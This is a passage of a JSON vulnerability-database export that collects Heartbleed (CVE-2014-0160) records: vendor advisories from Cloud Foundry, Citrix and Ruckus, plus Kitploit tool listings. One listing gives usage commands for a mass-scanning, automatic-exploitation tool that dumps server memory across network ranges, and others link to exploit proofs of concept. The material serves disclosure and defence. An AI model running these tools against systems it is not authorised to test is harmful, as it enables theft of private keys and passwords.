OpenSSL library, exploits are implementation specific and may require changes to implement the applicable protocol.\n\nThe vulnerability was fixed in [this](<https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db902>) patch.\n\nAssessed Attacker Value: 4  \nAssessed Attacker Value: 5\n",
            "modified": "2020-07-30T00:00:00",
            "published": "2014-04-07T00:00:00",
            "id": "AKB:D165638B-97C5-4C99-BFA0-70576DB52324",
            "href": "https://attackerkb.com/topics/8avLg1j8ou/cve-2014-0160-aka-heartbleed",
            "type": "attackerkb",
            "title": "CVE-2014-0160 (AKA: Heartbleed)",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        }
    ],
    "cloudfoundry": [
        {
            "lastseen": "2020-03-11T02:54:32",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "CVE-2014-0160 Heartbleed\n\n# \n\nCritical\n\n# Vendor\n\nOpenSSL.org\n\n# Versions Affected\n\n  * 1.0.1 through 1.0.1f\n\n# Description\n\nThe (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\n\n# Affected VMware Products and Versions\n\n_Severity is critical unless otherwise noted.  \n_\n\n  * vFabric Web Server 5.0.x, 5.1.x, 5.2.x, 5.3.x\n  * vFabric GemFire Native Client 7.0.0.X, 7.0.1.X\n  * VMware GemFire Native Client 7.0.2.X\n  * VMware Command Center 2.0.x, 2.1.x\n  * VMware App Suite Virtual Appliance 1.0.1.3\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n  * vFabric Web Server users (all versions) should apply the patch including version 1.0.1g of OpenSSL per the instructions posted here as soon as possible.\n  * GemFire Native Client 7.0.X users should immediately upgrade to OpenSSL 1.0.1g or later or recompile their existing OpenSSL 1.0.1 installations with the \u2013DOPENSSL_NO_HEARTBEATS option. See [CVE-2014-0160-GemFire-Native-Client](<http://gemfire.docs.pivotal.io/security/CVE-2014-0160-GemFire-Native-Client.pdf>) for more information.\n  * Please see [this doc](<http://docs.pivotal.io/pivotalhd/advisories/CVE-2014-0160-Advisory-PCC.pdf>) for VMware Command Center.\n  * VMware App Suite Virtual Appliance 1.0.1.3 users should upgrade to version 1.0.1.5 as soon as possible.\n\n# Credit\n\nThis bug was independently discovered by a team of security engineers (Riku, Antti and Matti) at Codenomicon and Neel Mehta of Google Security, who first reported it to the OpenSSL team. The Codenomicon team found the Heartbleed bug while improving the SafeGuard feature in Codenomicon\u2019s Defensics security testing tools and reported this bug to the NCSC-FI for vulnerability coordination and reporting to the OpenSSL team.\n\n# References\n\n  * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>\n  * <http://www.openssl.org/news/vulnerabilities.html>\n  * <http://www.kb.cert.org/vuls/id/720951>\n  * <http://heartbleed.com/>\n  * <https://access.redhat.com/site/solutions/781793>\n\n# History\n\n2014-Apr-7: Initial vulnerability report published.\n",
            "edition": 6,
            "modified": "2014-04-10T00:00:00",
            "published": "2014-04-10T00:00:00",
            "id": "CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940",
            "href": "https://www.cloudfoundry.org/blog/cve-2014-0160/",
            "title": "CVE-2014-0160 Heartbleed | Cloud Foundry",
            "type": "cloudfoundry",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        }
    ],
    "kitploit": [
        {
            "lastseen": "2020-02-25T04:38:44",
            "bulletinFamily": "tools",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "[ ![](https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png) ](<https://2.bp.blogspot.com/-Mbb_SUv_D74/U0XpU8smaLI/AAAAAAAACWI/jTkhKsqAzNE/s1600/heartbleed.png>)\n\n  \n  \n  \n\n\n  * A checker (site and tool) for CVE-2014-0160: [ https://github.com/FiloSottile/Heartbleed ](<https://github.com/FiloSottile/Heartbleed>)\n  * ** ssltest.py ** : Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford [ http://pastebin.com/WmxzjkXJ ](<https://pastebin.com/WmxzjkXJ>)\n  * ** SSL Server Test ** [ https://www.ssllabs.com/ssltest/index.html ](<https://www.ssllabs.com/ssltest/index.html>)\n  * ** Metasploit Module: ** [ https://github.com/rapid7/metasploit-framework/pull/3206/files ](<https://github.com/rapid7/metasploit-framework/pull/3206/files>)\n  * ** Nmap NSE script: ** Detects whether a server is vulnerable to the OpenSSL Heartbleed: [ https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse ](<https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse>)\n  * ** Nmap NSE script: ** Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas [ https://gist.github.com/RealRancor/10140249 ](<https://gist.github.com/RealRancor/10140249>)\n  * ** Heartbleeder: ** Tests your servers for OpenSSL: [ https://github.com/titanous/heartbleeder?files=1 ](<https://github.com/titanous/heartbleeder?files=1>)\n  * ** Heartbleed Attack POC and Mass Scanner: ** [ https://bitbucket.org/fb1h2s/cve-2014-0160 ](<https://bitbucket.org/fb1h2s/cve-2014-0160>)\n  * ** Heartbleed Honeypot Script: ** [ http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt ](<http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt>)\n",
            "edition": 20,
            "modified": "2014-04-10T00:55:31",
            "published": "2014-04-10T00:55:31",
            "id": "KITPLOIT:8800200070735873517",
            "href": "http://www.kitploit.com/2014/04/collection-of-heartbleed-tools-openssl.html",
            "title": "Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)",
            "type": "kitploit",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        },
        {
            "lastseen": "2020-04-07T04:43:38",
            "bulletinFamily": "tools",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "[ ![](https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s640/Heartbleed_Scanner.png) ](<https://4.bp.blogspot.com/-skuQnYDMoeg/VgyaDSePF2I/AAAAAAAAErQ/_PvtuA7Eobc/s1600/Heartbleed_Scanner.png>)\n\n  \n\n\n[ ![](https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s640/Heartbleed%2BScanner.png) ](<https://4.bp.blogspot.com/-4_jmIXJOYP4/VgyazZV8McI/AAAAAAAAErY/0zg4jbkRndU/s1600/Heartbleed%2BScanner.png>)\n\n  \n\n\nHeartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python. \n\n  \n\n\nFor scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after.   \n\n\n  \n\n\nHearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS. \n    \n    \n    git clone https://github.com/hybridus/heartbleedscanner.git\n\n  \n** Sample usage  **   \n  \nTo scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file:   \n\n    \n    \n    python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r\n\n  \nTo scan the same network against SMTP Over SSL/TLS and randomize the IP addresses   \n\n    \n    \n    python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r\n\n  \nIf you already have a target list which you created by using nmap/zmap   \n\n    \n    \n    python heartbleedscan.py -i targetlist.txt\n\n  \n** Dependencies  **   \n**   \n** Before using Heartbleed Vulnerability Scanner, you should install ** python-netaddr ** package.   \n  \nCentOS or CentOS-like systems :   \n\n    \n    \n    yum install python-netaddr\n\n  \nUbuntu or Debian-like systems :   \n\n    \n    \n    apt-get insall python-netaddr\n\n  \n  \n\n\n** [ Download Heartbleed Vulnerability Scanner ](<https://github.com/hybridus/heartbleedscanner>) **\n",
            "edition": 18,
            "modified": "2015-10-01T09:47:01",
            "published": "2015-10-01T09:47:01",
            "id": "KITPLOIT:7942195329946074809",
            "href": "http://www.kitploit.com/2015/10/heartbleed-vulnerability-scanner.html",
            "title": "Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)",
            "type": "kitploit",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        }
    ],
    "citrix": [
        {
            "lastseen": "2020-11-18T15:29:34",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160",
                "CVE-2015-0160"
            ],
            "description": "<section class=\"article-content\" data-swapid=\"ArticleContent\">\n<div class=\"content-block\" data-swapid=\"ContentBlock\"><div>\n<div>\n<p> <a name=\"TopOfPage\"></a></p>\n<p> <span> <b>Overview</b></span></p>\n<p> <span>A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSSL server or client. </span></p>\n<p> <span>The issue has been assigned the following CVE identifier and is also known as the Heartbleed vulnerability:</span></p>\n<p> <span>CVE-2014-0160: <u> <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160</a></u></span></p>\n<p> <span> <b>What Citrix is Doing</b></span></p>\n<p> <span>Citrix has analyzed the impact of this issue on currently supported products. The following sections of this advisory provide impact information on each product.</span></p>\n<p> <span> <b>Products That Require Citrix Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 HDX RealTime Optimization Pack for Microsoft Lync 2010:</b> This component is vulnerable to CVE-2014-0160. An updated version of this component has been released to address this issue. Citrix recommends customers deploy these patches as soon as possible. These patches can be found on our website at the following locations:</span></p>\n<p> <span>o Windows - <u> <a href=\"https://support.citrix.com/article/CTX140719\">https://support.citrix.com/article/CTX140719</a></u></span></p>\n<p> <span>o Mac - <u> <a href=\"https://support.citrix.com/article/CTX140730\">https://support.citrix.com/article/CTX140730</a></u></span></p>\n<p> <span>o Linux - <u> <a href=\"https://support.citrix.com/article/CTX140732\">https://support.citrix.com/article/CTX140732</a></u></span></p>\n<p> <span> <b>\u2022 Citrix XenMobile App Controller: </b>XenMobile App Controller versions 2.9 and 2.10 are vulnerable to CVE-2014-0160. Patches have been released to address this issue for both App controller 2.9 and 2.10. Citrix recommends that customers deploy these patches as soon as possible. These patches are available from the following location: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Further information on this can be found in the following blog post: <u> <a href=\"http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/\">http://blogs.citrix.com/2014/04/15/citrix-xenmobile-security-advisory-for-heartbleed/</a></u> <a name=\"P17_1652\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDX Toolkit &amp; SDK:</b> MDX Toolkit and SDK Versions 2.2.1 (XenMobile 8.6.1) and 2.3.61 (XenMobile 8.7) use a vulnerable version of OpenSSL when wrapping iOS applications. Enterprise-ready mobile apps on the Worx App Gallery that use this version of Worx SDK also use a vulnerable version of OpenSSL. Outgoing micro VPN network connections to Access Gateway from iOS applications that were wrapped, or Worx SDK enabled, with this version will be encapsulated in a TLS connection that uses a vulnerable version of OpenSSL. Citrix has released a new version of the MDX Toolkit &amp; SDK for iOS and Android Build MDX Toolkit; this can be found on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenmobile/product-software.html\">https://www.citrix.com/downloads/xenmobile/product-software.html</a></u>. Wrapped Android applications make use of the underlying Android version of OpenSSL, Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for iOS:</b> Worx Home for iOS version 8.7 uses a vulnerable version of OpenSSL. A new version of this software, 8.7.1.27, can be downloaded from the Apple App Store at the following address: <u> <a href=\"https://itunes.apple.com/us/app/worx-home/id434682528?mt=8\">https://itunes.apple.com/us/app/worx-home/id434682528?mt=8</a></u>. Customers that are using wrapped versions of iOS Worx applications are also advised to review the guidance on the MDX Toolkit given above. </span></p>\n<p> <span> <b>\u2022 Receiver for BlackBerry:</b> The Receiver for BlackBerry 10 version 2.0.0.21 is vulnerable to CVE-2014-0160. A new version of the Receiver for BlackBerry 10, 2.0.0.22, can be downloaded from the BlackBerry World website at the following address: <u> <a href=\"http://appworld.blackberry.com/webstore/content/34621918\">http://appworld.blackberry.com/webstore/content/34621918</a></u>. Receiver for PlayBook version 1.0.0 and Receiver for BlackBerry version 2.2 are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Licensing:</b> The Citrix License Server for Windows version 11.11.1, the Citrix License Server VPX version 11.12 and the Citrix Usage Collector are vulnerable to CVE-2015-0160. New versions of the License Server for Windows , 11.11.1.13017, and the License Server VPX, 11.12.14001, can be downloaded from the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/licensing/license-server.html\">https://www.citrix.com/downloads/licensing/license-server.html</a></u> </span></p>\n<p> <span> <b>\u2022 Citrix CloudPlatform:</b> The TLS interface exposed by the Secondary Storage VM in Cloud Platform versions 4.2.0, 4.2.1-x and 4.3.0.0 use a version of OpenSSL that is vulnerable to CVE-2014-0160. Citrix has released updated system virtual machine templates to resolve this issue. Citrix recommends that customers update the system virtual machine templates to a patched version and then reboot any Secondary Storage VMs to ensure that the updated OpenSSL version is being used. Instructions on updating the system virtual machine templates can be found in the following Citrix knowledge base article <u> <a href=\"https://support.citrix.com/article/CTX200024\">https://support.citrix.com/article/CTX200024</a></u>.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient XT:</b> XenClient XT versions 3.1.4, 3.2.0, and 3.2.1 are vulnerable to CVE-2014-0160. A new version of XenClient XT, 3.2.2, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-xt-322.html</a></u>. The XenClient XT Synchronizer makes use of the platform provided OpenSSL library. Customers are advised to verify that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenClient Enterprise:</b> Some versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160. In deployments where the XenClient Synchronizer is only accessed via fully trusted networks, the level of exposure is reduced. The TLS libraries used by currently supported versions of the XenClient Enterprise Synchronizer are not vulnerable to CVE-2014-0160. The following versions of XenClient Enterprise Engine are vulnerable to CVE-2014-0160: </span></p>\n<p> <span>o 4.1.0, 4.1.1, 4.1.2, 4.1.3, and 4.1.4. Citrix has released a new version of the XenClient Enterprise engine, 4.1.5. This can be found at the following address:  <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-41.html</a></u></span></p>\n<p> <span>o 4.5.1, 4.5.2, 4.5.3, 4.5.4, and 4.5.5. Citrix has released a new version of the XenClient Enterprise engine, 4.5.6. This can be found at the following address:  <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-45</a></u></span></p>\n<p> <span>o 5.0.0, 5.0.1, 5.0.2, 5.0.3, 5.0.4 and 5.0.5. Citrix has released a new version of the XenClient Enterprise engine, 5.0.6. This can be found at the following address:  <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-50.html</a></u></span></p>\n<p> <span>o 5.1.0, and 5.1.1. Citrix has released a new version of XenClient Enterprise, 5.1.2. This can be found at the following address: <u> <a href=\"https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html\">https://www.citrix.com/downloads/xenclient/product-software/xenclient-enterprise-51.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix DesktopPlayer for Mac:</b> DesktopPlayer for Mac version 1.0.x up to and including version 1.0.3 is vulnerable to CVE-2014-0160. A new version of the Desktop Player for Mac, 1.0.4, is available on the Citrix website at the following address: <u> <a href=\"https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html\">https://www.citrix.com/downloads/desktopplayer-for-mac/product-software/desktopplayer-for-mac-10.html</a></u>. The TLS libraries used by currently supported versions of the DesktopPlayer Synchronizer are not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That May Require Third Party Updates:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix XenDesktop 7.5:</b> Customers deploying Virtual Desktop Agents that are hosted on Citrix CloudPlatform are advised to verify that the volume worker template is using a version of OpenSSL that is not vulnerable to CVE-2014-0160. Setup instructions for the volume worker template on CloudPlatform can be found in the following document: <u> <a href=\"https://support.citrix.com/article/CTX140428\">https://support.citrix.com/article/CTX140428</a></u>. Amazon Web Services based deployments use the Linux AMI template. Guidance from Amazon covering VMs based on this template can be found at the following location: <u> <a href=\"https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\">https://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Android:</b> Receiver for Android makes use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement by Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u> <a name=\"P43_8077\"></a>.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile Worx components for Android:</b> Worx components running on Android make use of the OpenSSL library provided by the underlying Android platform. Citrix advises customers to check with their device vendors to ensure that the underlying Android version is not vulnerable to CVE-2014-0160. An initial statement from Google on Android can be found here: <u> <a href=\"http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html\">http://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html</a></u>. </span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Linux:</b> The TLS libraries included in currently supported versions of Receiver for Linux are not vulnerable to CVE-2014-0160. Version 13.0 of the Receiver for Linux also makes use of the platform provided OpenSSL library. Customers using this version are advised to ensure that the version of OpenSSL installed on the underlying Linux Operating System is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Web Interface:</b> Web Interface makes use of the TLS functionality provided by the underlying web server. Citrix customers are advised to verify that any deployed web servers used to host Web Interface are not vulnerable to this issue. Web Interface can also use a built-in TLS library to make outgoing TLS connections, this library is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Business Manager: </b>This product does not include any TLS libraries and, as such, is not vulnerable to CVE-2014-0160. Some customer deployments may make use of an additional SSL proxy component; Citrix advises customers to contact the vendors of any SSL proxy components being used to determine if they are vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Products That Are Not Impacted:</b></span></p>\n<ul>\n<p> <span> <b>\u2022 Citrix Provisioning Services:</b> Currently supported versions of Citrix Provisioning Services are not affected by CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenServer:</b> The TLS libraries used by currently supported versions of XenServer are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix VDI-in-a-Box:</b> The TLS libraries used by currently supported versions of VIAB are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenMobile MDM Edition: </b>The TLS libraries used by components of XenMobile MDM edition, including the XenMobile Device Manager component, are not vulnerable to CVE-2014-0160<b>.</b></span></p>\n<p> <span> <b>\u2022 Citrix CloudPortal Services Manager:</b> The TLS libraries used by currently supported versions of CloudPortal Services Manager are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Windows:</b> The TLS libraries used by currently supported versions of Receiver for Windows are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for Mac:</b> The TLS libraries used by currently supported versions of Receiver for Mac are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Receiver for iOS:</b> The TLS libraries used by currently supported versions of Receiver for iOS are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix ByteMobile: </b>The TLS libraries used by currently supported versions of ByteMobile are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix NetScaler:</b> The TLS libraries used by currently supported versions of the NetScaler product are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Access Gateway</b>:<b> </b>The TLS libraries used by currently supported versions of Access Gateway are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix CloudBridge:</b> The TLS libraries used by currently supported versions of Citrix CloudBridge, including client components, are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Secure Gateway (CSG):</b> The TLS library used by the currently supported version of CSG is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix XenApp SSLRelay Component:</b> The TLS libraries used by currently supported versions of the XenApp SSLRelay are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Single Sign-on, previously known as Password Manager:</b> The TLS libraries used by currently supported versions of Citrix Single Sign-on are not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix StoreFront:</b> The TLS library used by currently supported versions of Citrix Storefront is not vulnerable to CVE-2014-0160.</span></p>\n<p> <span> <b>\u2022 Citrix Merchandising Server:</b> The TLS library used by the currently supported version of Citrix Merchandising Server is not vulnerable to CVE-2014-0160.</span></p>\n</ul>\n<p> <span> <b>Obtaining Support on This Issue</b></span></p>\n<p> <span>If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at <u> <a href=\"http://www.citrix.com/site/ss/supportContacts.asp\">http://www.citrix.com/site/ss/supportContacts.asp</a></u>. More information on the support status of Citrix products can be found on our website at the following address: <u> <a href=\"http://www.citrix.com/support/product-lifecycle/product-matrix.html\">http://www.citrix.com/support/product-lifecycle/product-matrix.html</a></u>.</span></p>\n<p> <span> <b>Reporting Security Vulnerabilities to Citrix</b></span></p>\n<p> <span>Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For guidance on how to report security-related issues to Citrix, please see the following document: CTX081743 \u2013 <a href=\"/article/CTX081743\">Reporting Security Issues to Citrix</a></span></p>\n</div>\n</div></div>\n</section>",
            "edition": 2,
            "modified": "2019-08-15T04:00:00",
            "published": "2014-04-09T04:00:00",
            "id": "CTX140605",
            "href": "https://support.citrix.com/article/CTX140605",
            "title": "CVE-2014-0160 - Citrix Security Advisory for the Heartbleed vulnerability",
            "type": "citrix",
            "cvss": {
                "score": 9.0,
                "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"
            }
        }
    ],
    "securityvulns": [
        {
            "lastseen": "2018-08-31T11:10:51",
            "bulletinFamily": "software",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library&#39;s &quot;Heart bleed&quot; vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver.  An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n    Device                                    Affected software\r\n- ---------------------           ------------------\r\nSmart Cell Gateway                      1.1.x\r\nSmartCell Access Points               NOT AFFECTED\r\nZoneDirector Controllers             NOT AFFECTED\r\nZoneFlex  Access Points               NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL&#39;s\r\nimplementation of the TLS/DTLS &#40;transport layer security protocols&#41;\r\nheartbeat extension &#40;RFC6520&#41;. This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- -  Administrative HTTPS Interface &#40;Port 8443&#41;\r\n\r\n\r\nCVSS v2 Base Score:5.0 &#40;MEDIUM&#41; &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;\r\n\r\n\r\n   \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch&#40;es&#41;\r\nas soon as practical.  However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device&#39;s\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch&#40;es&#41;\r\nas soon as practical.\r\n\r\nThe following software builds have the fix &#40;any later builds will also\r\nhave the fix&#41;:\r\n\r\n\r\nBranch            Software Build\r\n- -------        ------------------\r\n1.1.x            1.1.2.0.142\r\n\r\n\r\n\r\n\r\nDISCOVERY\r\n\r\nThis vulnerability was disclosed online on various sources :\r\n\r\n- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\r\n- - https://www.openssl.org/news/secadv_20140407.txt\r\n- - http://heartbleed.com/\r\n\r\n\r\n\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nRuckus customers can contact Ruckus support to obtain the fixed firmware\r\n\r\nRuckus Support contact list is at:\r\n    https://support.ruckuswireless.com/contact-us\r\n\r\n\r\nPUBLIC ANNOUNCEMENTS\r\n\r\nThis security advisory will be made available for public consumption\r\non April 14, 2014 at the following source\r\n\r\nRuckus Website\r\nhttp://www.ruckuswireless.com/security\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Ruckus&#39;s\r\nwebsite, but may or may not be actively announced on mailing lists.\r\n\r\nREVISION HISTORY\r\n\r\n      Revision 1.0 / 14th April 2014 / Initial release\r\n\r\n\r\nRUCKUS WIRELESS SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Ruckus\r\nWireless\r\nproducts, obtaining assistance with security incidents is available at\r\n      http://www.ruckuswireless.com/security\r\n \r\n \r\nFor reporting new security issues, email can be sent to\r\nsecurity&#40;at&#41;ruckuswireless.com\r\nFor sensitive information we encourage the use of PGP encryption. Our\r\npublic keys can be\r\nfound at http://www.ruckuswireless.com/security\r\n\r\n                      \r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Ruckus cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Ruckus does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Ruckus may update this\r\nadvisory.\r\n\r\n\r\n&#40;c&#41; Copyright 2014 by Ruckus Wireless\r\nThis advisory may be redistributed freely after the public release\r\ndate given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG/MacGPG2 v2.0.18 &#40;Darwin&#41;\r\nComment: GPGTools - http://gpgtools.org\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQEcBAEBAgAGBQJTTBeuAAoJEFH6g5RLqzh1fRsIAJ9MtudIbdzR7mm/hP0i7boN\r\nMqlHAnFWai1c99UX048I9PSwWzWuEj4/1E4jy4vQqxLG8gO0YbAQiGq4DDGErCU0\r\nAywV+p3Xlcn0SXp0vse/qnhOT0jVOOKXPZSokmoptQXbd28ZOYtGfMJozTvPh2vf\r\nAvGq2B5kciGVhvBc9hdHGhSla/xUr/puIOBKFtNfMuxPujJ62t8g07w2HCB51PL/\r\n5E5MrP4540n3ONZ9+w5h/AeVfvVXsFv25VuElckq6Anzm+iqNRjcWHdync14UqPx\r\n2kXr1E72zRYbY/Z7+QkQuL1REkka+RtGcwbo05u+aEUnPx3E9wvdCHjf6XhxcbI=\r\n=sbsc\r\n-----END PGP SIGNATURE-----\r\n\r\n",
            "edition": 1,
            "modified": "2014-04-20T00:00:00",
            "published": "2014-04-20T00:00:00",
            "id": "SECURITYVULNS:DOC:30472",
            "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30472",
